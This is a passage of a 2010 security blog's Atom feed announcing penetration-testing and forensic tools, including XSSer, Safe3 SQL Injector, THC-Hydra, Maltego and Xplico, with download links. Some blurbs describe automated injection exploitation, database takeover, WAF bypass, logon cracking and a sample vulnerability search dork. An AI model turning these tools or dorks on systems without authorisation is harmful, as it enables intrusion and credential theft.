profile.The objective is to 'Automate Application  Security Knowledge and Workflows" &lt;br /&gt;&lt;br /&gt;Download: &lt;a href="http://code.google.com/p/o2platform/downloads/list"&gt;Here&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;Documentation: &lt;a href="http://www.o2platform.com/"&gt;http://www.o2platform.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-6850838443342656428?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/6850838443342656428/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/08/owasp-o2-platform-v11-beta.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6850838443342656428'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6850838443342656428'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/08/owasp-o2-platform-v11-beta.html' title='OWASP O2 Platform v1.1 Beta'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_xJ5LrusWfss/TDY4MbjDAPI/AAAAAAAAAfM/ldA0sBIipfk/s72-c/7_5_2010_3_18_24_PM_tmp90A4.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-9202568749865042199</id><published>2010-07-29T23:16:00.000+08:00</published><updated>2010-07-29T23:17:59.960+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>XSSer v0.6 - "XSSer Storm"</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_xJ5LrusWfss/TC96mwEXjqI/AAAAAAAAAe0/C4cT6EvEbJg/s1600/sc_Xsser3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="125" src="http://4.bp.blogspot.com/_xJ5LrusWfss/TC96mwEXjqI/AAAAAAAAAe0/C4cT6EvEbJg/s200/sc_Xsser3.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;SSer is an open source penetration testing tool that automates the  process of detecting and exploiting XSS injections against different  applications.&lt;br /&gt;It contains several options to try to bypass certain filters, and various special techniques of code injection.  &lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;XSSer v0.6a aka "XSSer Storm!" supports this new features:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; -g&lt;/span&gt; DORK             Process search engine dork results as target urls&lt;br /&gt;(ex:inurl:vulnerable.asp?id=)&lt;br /&gt;--Ge=DORK_ENGINE    Search engine to use for dorking (scroogle,&lt;br /&gt;duck, altavista, bing)&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;-c&lt;/span&gt; CRAWLING     Crawl target hierarchy parameters (can be slow!)&lt;br /&gt;--Cw=CRAWLING_WIDTH Number of urls to visit when crawling&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;--Dfo&lt;/span&gt;               Encodes fuzzing IP addresses in DWORD format&lt;br /&gt;&lt;br /&gt;Download: &lt;a href="http://xsser.sourceforge.net/"&gt;http://xsser.sourceforge.net&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-9202568749865042199?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/9202568749865042199/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/07/xsser-v06-xsser-storm.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/9202568749865042199'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/9202568749865042199'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/07/xsser-v06-xsser-storm.html' title='XSSer v0.6 - &quot;XSSer Storm&quot;'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_xJ5LrusWfss/TC96mwEXjqI/AAAAAAAAAe0/C4cT6EvEbJg/s72-c/sc_Xsser3.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-6412084635005123916</id><published>2010-07-22T21:46:00.000+08:00</published><updated>2010-07-28T18:40:42.870+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>"Backup" Tools For Mysql Administration</title><content type='html'>&lt;b&gt;mysqldumper&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;MySQLDumper is a script for backing up MySQL databases written in PHP  and Perl. It uses a proprietary technique to avoid execution  interruption by reading and saving a certain amount of commands, then  calling itself via JavaScript to memorize how far in the process it was.  Finally, the script resumes its action from last standby.&lt;br /&gt;&lt;br /&gt;Download:&lt;br /&gt;Code:http://forum.mysqldumper.de/downloads.php?cat=2[Image]&lt;br /&gt;&lt;br /&gt;&lt;b&gt;phpMyBackupPro&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;phpMyBackup Pro is a very easy to use, free, web-based MySQL backup  script, licensed under the GNU GPL. Script allows a lot of operations  such: backup of one or several databases with or without data, table  structure; backup directly onto FTP server and sending of backups by  email; manage, restore and schedule backups and others. phpMyBackup Pro  is platform independent: it requires only a web-server and PHP.&lt;br /&gt;&lt;br /&gt;Download:&lt;br /&gt;Code:http://www.phpmybackuppro.net/download.php[Image]&lt;br /&gt;&lt;br /&gt;&lt;b&gt;AutoMySQLBackup&lt;/b&gt;&lt;br /&gt;A shell script to take daily, weekly and monthly backups of MySQL  databases using mysqldump. It's features includes: backing up mutiple  databases, create a backup into a single backup file or to a separate  file for each DB, backup files compression, backup to remote server,  e-mail user when backup is completed and others.&lt;br /&gt;&lt;br /&gt;Download&lt;br /&gt;Code:http://sourceforge.net/projects/automysqlbackup/files/&lt;b&gt;&lt;br /&gt;&lt;br /&gt;Backup2Mail&lt;/b&gt;&lt;br /&gt;Backup2Mail is a PHP script that creates regular backups of MySQL  databases and sends them to configurable e-mail address. The whole  process can be scheduled with a help of Cron (for Unix/Linux) or with  Task Scheduler (for Windows).&lt;br /&gt;&lt;br /&gt;Download&lt;br /&gt;Code:http://www.backup2mail.com/download/backup2mail.zip&lt;b&gt;&lt;br /&gt;&lt;br /&gt;mylvmbackup&lt;/b&gt;&lt;br /&gt;mylvmbackup is utility for creating MySQL backups via LVM snapshots. To  perform this, mylvmbackup obtains a read lock on all tables, flushes all  server caches to disk, creates a snapshot of the volume containing the  MySQL data directory and unlocks the tables again. The LVM snapshot is  mounted to a temporary directory and all data is backed up using the tar  or rsync program. Script requires Perl5 and LVM utilities.&lt;br /&gt;&lt;br /&gt;Download&lt;br /&gt;Code:http://www.lenzg.net/mylvmbackup/#Downloads&lt;b&gt;&lt;br /&gt;&lt;br /&gt;MyPHPdumpTool (mpdt)&lt;/b&gt;&lt;br /&gt;MyPHPdumpTool is a PHP (CLI) based MySQL backup tool that can be  configured to automatically archive and upload any database-dump file to  any FTP server. The backup process can be scheduled with a help of Cron  (for Unix/Linux) or with Task Scheduler (for Windows).&lt;br /&gt;&lt;br /&gt;Download:&lt;br /&gt;Code:http://sourceforge.net/projects/myphpdumptool/files/&lt;b&gt;&lt;br /&gt;&lt;br /&gt;mysqlblasy (MySQL backup for lazy sysadmins)&lt;/b&gt;&lt;br /&gt;mysqlblasy is a Perl script for automating MySQL database backups. The  main feature of this script is automatic backups rotation to avoid that  the backup disk gets full when the administrator is on vacation (or is  lazy). Each database gets dumped into a separate file, after which all  the dumps get tarred/compressed and placed into the specified backup  directory. Old files in the backup directory get deleted, and the number  of newest files that is specified in configuration file is kept.&lt;br /&gt;&lt;br /&gt;Download:&lt;br /&gt;Code:http://pol.spurious.biz/projects/scripting/mysqlblasy.php#download&lt;b&gt;Sypex  Dumper Lite&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Sypex Dumper Lite is developed by specialists of Ukrainian  company and  it is a PHP script for quick and easy MySQL database backup. The script  is very fast with all types of databases (small or large), because it  uses special technique for dumping: the backup file is not stored  entirely in memory.&lt;br /&gt;&lt;br /&gt;Download:&lt;br /&gt;Code:http://sypex.net/products/dumper/downloads/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-6412084635005123916?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/6412084635005123916/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/07/backup-tools-for-mysql-administration.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6412084635005123916'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6412084635005123916'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/07/backup-tools-for-mysql-administration.html' title='&quot;Backup&quot; Tools For Mysql Administration'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-8543012061805247944</id><published>2010-07-12T22:52:00.000+08:00</published><updated>2010-07-28T18:40:28.602+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>Safe3 SQL Injector</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_vUW0F0UxPvk/TDssF8sd3-I/AAAAAAAAAM4/v4Foh7D3PZQ/s1600/safe3-sql-injection.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="164" src="http://2.bp.blogspot.com/_vUW0F0UxPvk/TDssF8sd3-I/AAAAAAAAAM4/v4Foh7D3PZQ/s200/safe3-sql-injection.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Safe3 SQL Injector is one of the most powerful penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of back-end database servers. &lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Features:&lt;/span&gt;&lt;br /&gt;Full support for GET/Post/Cookie Injection; &lt;br /&gt;Full support for HTTP Basic, Digest, NTLM and Certificate authentications &lt;br /&gt;Full support for MySQL, Oracle, PostgreSQL,MSSQL,ACESS,DB2,Sybase,Sqlite &lt;br /&gt;Full support for Error/Union/Blind/Force SQL injection&lt;br /&gt;Support for file acess,command execute,ip domain reverse,web path guess,md5 crack,etc.&lt;br /&gt;Super bypass WAF &lt;br /&gt;&lt;br /&gt;Download: &lt;a href="http://sourceforge.net/projects/safe3si/files/Safe3SI.5.1.rar/download"&gt;http://sourceforge.net&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-8543012061805247944?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/8543012061805247944/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/07/safe3-sql-injector.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/8543012061805247944'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/8543012061805247944'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/07/safe3-sql-injector.html' title='Safe3 SQL Injector'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_vUW0F0UxPvk/TDssF8sd3-I/AAAAAAAAAM4/v4Foh7D3PZQ/s72-c/safe3-sql-injection.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-5211834741753467806</id><published>2010-07-08T22:53:00.001+08:00</published><updated>2010-07-08T22:54:24.518+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>THC-Hydra</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_xJ5LrusWfss/TBZCkGpXj2I/AAAAAAAAAdY/fcKzkB2_HME/s1600/hydra_target.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="158" src="http://4.bp.blogspot.com/_xJ5LrusWfss/TBZCkGpXj2I/AAAAAAAAAdY/fcKzkB2_HME/s200/hydra_target.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="font-weight: bold;"&gt;&amp;nbsp; &lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;A very fast network logon cracker which support many different services&lt;/span&gt;  &lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Currently this tool supports:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;TELNET, FTP, Firebird, HTTP-GET, HTTP-HEAD, HTTPS-GET, HTTP-HEAD, HTTP-PROXY,HTTP-PROXY-NTLM,HTTP-FORM-GET HTTP-FORM-POST, HTTPS-FORM-GET,HTTPS-FORM-POSTLDAP2, LADP3, SMB, SMBNT, MS-SQL, MYSQL,POSTGRES,POP3-NTLM, IMAP, IMAP-NTLM, NCP, NNTP, PCNFS, ICQ, SAP/R3, Cisco auth,Cisco enable, SMTP-AUTH, SMTP-AUTH-NTLM, SSH2, SNMP, CVS, Cisco AAA,REXEC, SOCKS5, VNC, POP3 and VMware Auth.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Changelog for 5.7:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;* Added ncp support plus minor fixes (by David Maciejak @ GMAIL dot com)&lt;br /&gt;* Added an old patch to fix a memory from SSL and speed it up too from kan(at)dcit.cz&lt;br /&gt;* Removed unnecessary compiler warnings&lt;br /&gt;* Enhanced the SSH2 module based on an old patch from aris(at)0xbadc0de.be&lt;br /&gt;* Fixed small local defined overflow in the teamspeak module. Does it still work anyway?? &lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Download: &lt;/span&gt;&lt;a href="http://freeworld.thc.org/thc-hydra/"&gt;http://freeworld.thc.org&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-5211834741753467806?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/5211834741753467806/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/07/thc-hydra-v57-released.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5211834741753467806'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5211834741753467806'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/07/thc-hydra-v57-released.html' title='THC-Hydra'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_xJ5LrusWfss/TBZCkGpXj2I/AAAAAAAAAdY/fcKzkB2_HME/s72-c/hydra_target.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-1093098800706767247</id><published>2010-07-07T12:01:00.000+08:00</published><updated>2010-07-08T22:54:09.504+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>Maltego version 3</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_xJ5LrusWfss/TBeueJ7nYPI/AAAAAAAAAdo/DU3ciL2uTd4/s1600/network_diagram.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="109" src="http://1.bp.blogspot.com/_xJ5LrusWfss/TBeueJ7nYPI/AAAAAAAAAdo/DU3ciL2uTd4/s200/network_diagram.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Maltego is an open source intelligence and forensics application. It will offer you timous mining and gathering of information as well as the representation of this information in a easy to understand format. &lt;br /&gt;&lt;br /&gt;Maltego can be used for the information gathering phase of all security related work. It will save you time and will allow you to work more accurately and smarter. &lt;br /&gt;Maltego aids you in your thinking process by visually demonstrating interconnected links between searched items. &lt;br /&gt;Maltego provide you with a much more powerful search, giving you smarter results. &lt;br /&gt;If access to "hidden" information determines your success, Maltego can help you discover it. &lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Download and more info:&lt;/span&gt; &lt;a href="http://www.paterva.com/"&gt;http://www.paterva.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-1093098800706767247?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/1093098800706767247/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/07/maltego-version-3.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1093098800706767247'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1093098800706767247'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/07/maltego-version-3.html' title='Maltego version 3'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_xJ5LrusWfss/TBeueJ7nYPI/AAAAAAAAAdo/DU3ciL2uTd4/s72-c/network_diagram.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-1684209947378586408</id><published>2010-07-05T15:01:00.000+08:00</published><updated>2010-07-05T15:06:12.247+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>NetworkMiner</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_xJ5LrusWfss/S__lTW9PIZI/AAAAAAAAAbw/0GJmQBrpjhY/s1600/screenshot.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="150" src="http://2.bp.blogspot.com/_xJ5LrusWfss/S__lTW9PIZI/AAAAAAAAAbw/0GJmQBrpjhY/s200/screenshot.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;NetworkMiner is a Network Forensic Analysis Tool (NFAT) for Windows that can detect the OS, hostname and open ports of network hosts through packet sniffing or by parsing a PCAP file. NetworkMiner can also extract transmitted files from network traffic &lt;b&gt;including common image file formats = fun !&lt;/b&gt; &lt;br /&gt;&lt;br /&gt;Download: &lt;a href="http://sourceforge.net/projects/networkminer/"&gt;http://sourceforge.net&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-1684209947378586408?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/1684209947378586408/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/07/networkminer.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1684209947378586408'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1684209947378586408'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/07/networkminer.html' title='NetworkMiner'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_xJ5LrusWfss/S__lTW9PIZI/AAAAAAAAAbw/0GJmQBrpjhY/s72-c/screenshot.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-8155668520658910059</id><published>2010-07-01T11:51:00.000+08:00</published><updated>2010-07-05T14:55:44.383+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>SSLCertScanner :  New Tool to Scan for SSL Certificates on Network</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span style="font-weight: bold;"&gt;&amp;nbsp;&lt;/span&gt;&lt;a href="http://4.bp.blogspot.com/_xJ5LrusWfss/S-wRNCz1IxI/AAAAAAAAAao/kiOOKTXyDw0/s1600/sslcertscanner_networkscan_big.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="158" src="http://4.bp.blogspot.com/_xJ5LrusWfss/S-wRNCz1IxI/AAAAAAAAAao/kiOOKTXyDw0/s200/sslcertscanner_networkscan_big.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;SSLCertScanner is the FREE network based SSL certificate scanner software. It can remotely scan SSL certificate on any host which may present on the intranet or internet. It can also scan single host or multiple hosts at a time. Once the SSL certificate is discovered, SSLCertScanner automatically validates it by checking for expiry date. &lt;br /&gt;SSLCertScanner supports HTTPS as well as LDAPS based SSL services for certificate scanning. During the scanning it displays detailed status message of current operation for each host. &lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Download: &lt;/span&gt;  &lt;a href="http://securityxploded.com/getfile.php?id=7521"&gt;http://securityxploded.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-8155668520658910059?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/8155668520658910059/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/07/sslcertscanner-new-tool-to-scan-for-ssl.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/8155668520658910059'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/8155668520658910059'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/07/sslcertscanner-new-tool-to-scan-for-ssl.html' title='SSLCertScanner :  New Tool to Scan for SSL Certificates on Network'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_xJ5LrusWfss/S-wRNCz1IxI/AAAAAAAAAao/kiOOKTXyDw0/s72-c/sslcertscanner_networkscan_big.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-1559262444402937541</id><published>2010-06-28T11:17:00.001+08:00</published><updated>2010-06-28T11:19:18.449+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>Xplico 0.5.7 - VoIP "Wire" Tapping</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_xJ5LrusWfss/S-l01YjXASI/AAAAAAAAAag/lrgJkEulzL4/s1600/rtp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="109" src="http://4.bp.blogspot.com/_xJ5LrusWfss/S-l01YjXASI/AAAAAAAAAag/lrgJkEulzL4/s200/rtp.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Xplico is an open source Network Forensic Analysis Tool. Its goal is to extract from an Internet traffic capture the applications data contained. From a pcap file Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on. &lt;br /&gt;&lt;br /&gt;This release introduces improvements in the SIP and RTP dissectors.&lt;br /&gt;In this version was also added the RTCP dissector, with this dissector Xplico is able to obtain the phone numbers of the caller and called party (obviously only if present in the RTCP packets).&lt;br /&gt;&lt;br /&gt;&lt;a href="http://pinoysecurity.blogspot.com/2010/06/deft-linux-51-computer-forensic-live-cd.html"&gt;DEFT 5.1&lt;/a&gt; Live distribution contains this version. &lt;br /&gt;&lt;br /&gt;Download :&amp;nbsp; &lt;a href="http://sourceforge.net/projects/xplico/files/"&gt;http://sourceforge.net/projects/xplico/files/&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-1559262444402937541?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/1559262444402937541/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/xplico-057-voip-t-wire-tapping.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1559262444402937541'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1559262444402937541'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/xplico-057-voip-t-wire-tapping.html' title='Xplico 0.5.7 - VoIP &quot;Wire&quot; Tapping'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_xJ5LrusWfss/S-l01YjXASI/AAAAAAAAAag/lrgJkEulzL4/s72-c/rtp.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-2824934307765752786</id><published>2010-06-27T15:38:00.000+08:00</published><updated>2010-06-28T11:19:18.450+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>DEFT Linux 5.1 Computer Forensic Live CD</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_xJ5LrusWfss/S-G6VBzwp2I/AAAAAAAAAZw/XLT47daE9u4/s1600/forensic-software.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://4.bp.blogspot.com/_xJ5LrusWfss/S-G6VBzwp2I/AAAAAAAAAZw/XLT47daE9u4/s200/forensic-software.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;DEFT Linux is a highly specialized Linux distribution aimed at forensic computing. It comes with a number of dedicated tools and is a computer investigator’s best friend. The latest release, 